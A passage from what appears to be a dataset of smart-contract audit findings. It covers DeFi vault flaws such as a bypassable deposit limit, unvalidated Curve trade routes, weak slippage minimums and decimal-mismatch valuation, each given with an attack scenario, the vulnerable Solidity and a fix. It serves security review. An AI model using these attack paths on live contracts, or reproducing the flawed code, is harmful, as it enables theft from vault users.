xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 
5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.чYou need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.чReserved funds protection can be brokenч```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n -maxTrainingDeposit can be bypassedчmediumчIt was observed that User can bypass the 
`maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`чIssue maxTrainingDeposit can be bypassed\\nIf user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\nчUser can bypass maxTrainingDeposit and deposit more than allowedч```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n -Risk of reward tokens being sold by malicious users under certain conditionsчhighчDue to the lack of validation of the selling token within the Curve adaptors, there is a risk that the reward tokens or Convex deposit tokens of the vault being sold by malicious users under certain conditions (e.g. 
if reward tokens equal to primary/secondary tokens OR a new exploit is found in other parts of the code).\\nFor a `EXACT_IN_SINGLE` trade within the Curve adaptors, the `from` and `to` addresses of the `exchange` function are explicitly set `to` `trade.sellToken` and `trade.buyToken` respectively. Thus, the swap is restricted `to` only `trade.sellToken` and `trade.buyToken`, which points `to` either the primary or secondary token of the pool. This prevents other tokens that reside in the vault `from` being swapped out.\\nHowever, this measure was not applied to the `EXACT_IN_BATCH` trade as it ignores the `trade.sellToken` and `trade.buyToken` , and allow the caller to define arbitrary `data.route` where the first route (_route[0]) and last route (_route[last_index]) could be any token.\\nThe vault will hold the reward tokens (CRV, CVX, LDO) when the vault administrator claims the rewards or a malicious user claims the rewards on behalf of the vault by calling Convex's getReward function.\\nAssume that attacker is faster than the admin calling the reinvest function. There is a possibility that an attacker executes a `EXACT_IN_BATCH` trade and specifies the `_route[0]` as one of the reward tokens residing on the vault and swaps away the reward tokens during depositing (_tradePrimaryForSecondary) or redemption (_sellSecondaryBalance). 
In addition, an attacker could also sell away the Convex deposit tokens if a new exploit is found.\\nIn addition, the vault also holds Convex deposit tokens, which represent assets held by the vault.\\nThis issue affects the in-scope `CurveV2Adapter` and `CurveAdapter` since they do not validate the `data.route` provided by the users.\\nCurveV2Adapter\\n```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n\\nCurveAdapter\\n```\\nFile: CurveAdapter.sol\\n function _exactInBatch(Trade memory trade) internal view returns (bytes memory executionCallData) {\\n CurveBatchData memory data = abi.decode(trade.exchangeData, (CurveBatchData));\\n\\n return abi.encodeWithSelector(\\n ICurveRouter.exchange.selector,\\n trade.amount,\\n data.route,\\n data.indices,\\n trade.limit\\n );\\n }\\n```\\n\\nFollowing are some examples of where this vulnerability could potentially be exploited. 
Assume a vault that supports the CurveV2's ETH/stETH pool.\\nPerform the smallest possible redemption to trigger the `_sellSecondaryBalance` function. Configure the `RedeemParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the primary token (ETH). This will cause the `finalPrimaryBalance` to increase by the number of incoming primary tokens (ETH), thus inflating the number of primary tokens redeemed.\\nPerform the smallest possible deposit to trigger the `_tradePrimaryForSecondary`. Configure `DepositTradeParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the secondary tokens (stETH). This will cause the `secondaryAmount` to increase by the number of incoming secondary tokens (stETH), thus inflating the number of secondary tokens available for the deposit.\\nUpon further investigation, it was observed that the vault would only approve the exchange to pull the `trade.sellToken`, which points to either the primary token (ETH) or secondary token (stETH). Thus, the reward tokens (CRV, CVX, or LDO) or Convex deposit tokens cannot be sent to the exchanges. Thus, the vault will not be affected if none of the reward tokens/Convex Deposit tokens equals the primary or secondary token.\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? 
trade.amount : trade.limit;\\n address sellToken = trade.sellToken;\\n // approve WETH instead of ETH for ETH trades if\\n // spender != address(0) (checked by the caller)\\n if (sellToken == Constants.ETH_ADDRESS) {\\n sellToken = address(Deployments.WETH);\\n }\\n IERC20(sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\nHowever, there might be some Curve Pools or Convex's reward contracts whose reward tokens are similar to the primary or secondary tokens of the vault. If the vault supports those pools, the vault will be vulnerable. In addition, the reward tokens of a Curve pool or Convex's reward contracts are not immutable. It is possible for the governance to add a new reward token that might be the same as the primary or secondary token.чIt is recommended to implement additional checks when performing a `EXACT_IN_BATCH` trade with the `CurveV2Adapter` or `CurveAdapter` adaptor. The first item in the route must be the `trade.sellToken`, and the last item in the route must be the `trade.buyToken`. This will restrict the `trade.sellToken` to the primary or secondary token, and prevent reward and Convex Deposit tokens from being sold (Assuming primary/secondary token != reward tokens).\\n```\\nroute[0] == trade.sellToken\\nroute[last index] == trade.buyToken\\n```\\n\\nThe vault holds many Convex Deposit tokens (e.g. cvxsteCRV). A risk analysis of the vault shows that the worst thing that could happen is that all the Convex Deposit tokens are swapped away if a new exploit is found, which would drain the entire vault. For defense-in-depth, it is recommended to check that the selling token is not a Convex Deposit token under any circumstance when using the trade adaptor.\\nThe trade adaptors are one of the attack vectors that the attacker could potentially use to move tokens out of the vault if any exploit is found. 
Thus, they should be locked down or restricted where possible.\\nAlternatively, consider removing the `EXACT_IN_BATCH` trade function from the affected adaptors to reduce the attack surface if the security risk of this feature outweighs the benefit of the batch function.чThere is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code), thus potentially draining assets from the vault.ч```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. 
This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n -Slippage/Minimum amount does not work during single-side redemptionчhighчThe slippage or minimum amount of tokens to be received is set to a value much smaller than expected due to the use of `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount on behalf of the callers during a single-sided redemption. As a result, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `Curve2TokenConvexHelper._executeSettlement` function is called by the following functions:\\n`Curve2TokenConvexHelper.settleVault`\\n`Curve2TokenConvexHelper.settleVault` function is called within the `Curve2TokenConvexVault.settleVaultNormal` and `Curve2TokenConvexVault.settleVaultPostMaturity` functions\\n`Curve2TokenConvexHelper.settleVaultEmergency`\\n`Curve2TokenConvexHelper.settleVaultEmergency` is called by `Curve2TokenConvexVault.settleVaultEmergency`\\nIn summary, the `Curve2TokenConvexHelper._executeSettlement` function is called during vault settlement.\\nAn important point to note here is that within the `Curve2TokenConvexHelper._executeSettlement` function, the `params.minPrimary` and `params.minSecondary` are automatically computed and overwritten by the `TwoTokenPoolUtils._getMinExitAmounts` function (Refer to Line 124 below). Therefore, if the caller attempts to define the `params.minPrimary` and `params.minSecondary`, they will be discarded and overwritten. 
The `params.minPrimary` and `params.minSecondary` is for slippage control when redeeming the Curve's LP tokens.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\nThe `TwoTokenPoolUtils._getMinExitAmounts` function calculates the minimum amount on the share of the pool with a small discount.\\nAssume a Curve Pool with the following configuration:\\nConsist of two tokens (DAI and USDC). 
DAI is primary token, USDC is secondary token.\\nPool holds 200 US Dollars worth of tokens (50 DAI and 150 USDC).\\nDAI <> USDC price is 1:1\\ntotalSupply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (50 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 50 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 24.9375 DAI\\n\\nminSecondary = same calculation = 74.8125 USDC\\n```\\n\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `24.9375 DAI` as `params.minPrimary` and `74.8125 USDC` as `params.minSecondary`.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen settling the vault, it is possible to instruct the vault to redeem the Curve's LP tokens single-sided 
or proportionally. Settle vault functions will trigger a chain of functions that will eventually call the `Curve2TokenConvexHelper._unstakeAndExitPool` function that is responsible for redeeming the Curve's LP tokens.\\nWithin the `Curve2TokenConvexHelper._unstakeAndExitPool` function, if the `params.secondaryTradeParams.length` is zero, the redemption will be single-sided (refer to Line 242 below). Otherwise, the redemption will be executed proportionally (refer to Line 247 below). For a single-sided redemption, only the `params.minPrimary` will be used.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _unstakeAndExitPool(\\n Curve2TokenPoolContext memory poolContext,\\n ConvexStakingContext memory stakingContext,\\n uint256 poolClaim,\\n RedeemParams memory params\\n ) internal returns (uint256 primaryBalance, uint256 secondaryBalance) {\\n // Withdraw pool tokens back to the vault for redemption\\n bool success = stakingContext.rewardPool.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n if (!success) revert Errors.UnstakeFailed();\\n\\n if (params.secondaryTradeParams.length == 0) {\\n // Redeem single-sided\\n primaryBalance = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity_one_coin(\\n poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary\\n );\\n } else {\\n // Redeem proportionally\\n uint256[2] memory minAmounts;\\n minAmounts[poolContext.basePool.primaryIndex] = params.minPrimary;\\n minAmounts[poolContext.basePool.secondaryIndex] = params.minSecondary;\\n uint256[2] memory exitBalances = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity(\\n poolClaim, minAmounts\\n );\\n\\n (primaryBalance, secondaryBalance) \\n = (exitBalances[poolContext.basePool.primaryIndex], exitBalances[poolContext.basePool.secondaryIndex]);\\n }\\n }\\n```\\n\\nAssume that the caller decided to perform a single-sided redemption of 50 LP Pool Tokens, using the earlier example. 
In this case,\\n`poolClaim` = 50 LP Pool Tokens\\n`params.minPrimary` = 24.9375 DAI\\n`params.minSecondary` = 74.8125 USDC\\nThe data passed into the `remove_liquidity_one_coin` will be as follows:\\n```\\n@notice Withdraw a single coin from the pool\\n@param _token_amount Amount of LP tokens to burn in the withdrawal\\n@param i Index value of the coin to withdraw\\n@param _min_amount Minimum amount of coin to receive\\n@return Amount of coin received\\ndef remove_liquidity_one_coin(\\n _token_amount: uint256,\\n i: int128,\\n _min_amount: uint256\\n) -> uint256:\\n```\\n\\n```\\nremove_liquidity_one_coin(poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary);\\nremove_liquidity_one_coin(50 LP_TOKEN, Index 0=DAI, 24.9375 DAI);\\n```\\n\\nAssume the pool holds 200 US dollars worth of tokens (50 DAI and 150 USDC), and the total supply is 100 LP Tokens. The pool's state is imbalanced, so any trade will result in significant slippage.\\nIntuitively (ignoring the slippage & fee), redeeming 50 LP Tokens should return approximately 100 US dollars worth of tokens, which means around 100 DAI. Thus, the slippage or minimum amount should ideally be around 100 DAI (+/- 5%).\\nHowever, the trade will be executed in the above example even if the vault receives only 25 DAI because the `params.minPrimary` is set to `24.9375 DAI`. This could result in a loss of around 75 DAI due to slippage (about 75% slippage rate) in the worst-case scenario.чWhen performing a single-side redemption, avoid using the `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount of tokens to receive on behalf of the caller. Instead, give the caller the flexibility to define the slippage (params.minPrimary). 
To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a single-side trade (remove_liquidity_one_coin) is to call the Curve Pool's `calc_withdraw_one_coin` function off-chain to calculate the amount received when withdrawing a single LP Token, and then apply an acceptable discount.\\nNote that the `calc_withdraw_one_coin` function cannot be used solely on-chain for computing the minimum amount because the result can be manipulated since it uses spot balances for computation.чThe slippage or minimum amount of tokens to be received is set to a value much smaller than expected. Thus, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.ч```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n -Reinvest will return sub-optimal return if the pool is imbalancedчhighчReinvesting only allows proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. 
This result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.\\nDuring reinvest rewards, the vault will ensure that the amount of primary and secondary tokens deposited is of the right proportion per the comment in Line 163 below.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nThe `Curve2TokenConvexHelper.reinvestReward` function will internally call the `Curve2TokenPoolUtils._checkPrimarySecondaryRatio`, which will check that the primary and secondary tokens deposited are of the right proportion.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n 
strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n\\nThis concept of proportional join appears to be taken from the design of earlier Notional's Balancer leverage vaults. For Balancer Pools, it is recommended to join with all the pool's tokens in exact proportions to minimize the price impact of the join (Reference).\\nHowever, the concept of proportional join to minimize slippage does not always hold for Curve Pools as they operate differently.\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). 
On the other hand, if a deposit moves the pool away from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nThe following is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.чConsider removing the `_checkPrimarySecondaryRatio` function from the `_validateSpotPriceAndPairPrice` function to give the callers the option to deposit the reward tokens in a \"non-proportional\" manner if a Curve Pool becomes imbalanced so that the deposit penalty could be minimized or the deposit bonus can be exploited to increase the return.чThere is no guarantee that a Curve Pool will always be balanced. 
Historically, there are multiple instances where the largest Curve pool (stETH/ETH) becomes imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the trade resulting in fewer tokens than possible due to the deposit penalty. In addition, the trade also misses out on the potential gain from the deposit bonus.\\nThe side-effect is that reinvesting the reward tokens will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.ч```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n -Curve vault will undervalue or overvalue the LP Pool tokens if it comprises tokens with different decimalsчhighчA Curve vault that comprises tokens with different decimals will undervalue or overvalue the LP Pool tokens. As a result, users might be liquidated prematurely or be able to borrow more than they are allowed. 
Additionally, the vault settlement process might break.\\nThe `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function, which is utilized by the Curve vault, is used to compute the total value of the LP Pool tokens (poolClaim) denominated in the primary token.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n\\nIf a leverage vault supports a Curve Pool that contains two tokens with different decimals, the math within the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function would not work, and the value returned from it will be incorrect. Consider the following two scenarios:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 
6)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is DAI.\\nDAI's decimals are 18, while USDC's decimals are 6.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 DAI and 100 USDC\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nThe `secondaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nNext, the code logic attempts to value the secondary balance (50 USDC) in terms of the primary token (DAI) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 USDC * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n```\\n\\n50 USDC should be worth 50 DAI (50 * 10^18). 
However, the `secondaryAmountInPrimary` shows that it is only worth 0.00000000005 DAI (50 * 10^6).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] * 10^18 / 10^18\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] // cancel out the 10^18\\nprimaryAmount = 50 DAI + 0.00000000005 DAI = 50.00000000005 DAI\\n```\\n\\n50 LP Pool tokens should be worth 100 DAI. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is only worth 50.00000000005 DAI, which undervalues the LP Pool tokens.\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is USDC.\\nUSDC's decimals are 6, while DAI's decimals are 18.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 USDC and 100 DAI\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nThe `secondaryBalance` will be `50 DAI`. 
